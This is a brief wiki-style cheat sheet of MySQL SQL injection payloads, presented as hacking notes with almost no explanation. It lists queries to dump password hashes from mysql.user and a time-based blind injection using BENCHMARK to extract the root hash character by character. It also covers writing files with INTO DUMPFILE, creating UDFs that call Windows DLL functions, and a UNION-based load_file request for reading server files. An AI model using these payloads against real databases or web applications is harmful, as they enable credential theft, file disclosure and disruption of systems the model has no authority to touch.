====== Hacking - SQL Injection - MySQL - Users ======

===== Users =====

<code sql>
SELECT User,Password FROM mysql.user;

SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root';
</code>

Write query into a new file (can not modify existing files):

<code sql>
SELECT ... INTO DUMPFILE
</code>

----

===== UDF (User-Defined Functions) =====

<code sql>
create function LockWorkStation returns integer soname 'user32';
select LockWorkStation(); 
create function ExitProcess returns integer soname 'kernel32';
select exitprocess();

SELECT USER();
SELECT password,USER() FROM mysql.user;
</code>

----

===== First byte of admin hash =====

<code sql>
SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
</code>

----

===== Read File =====

<code sql>
query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
</code>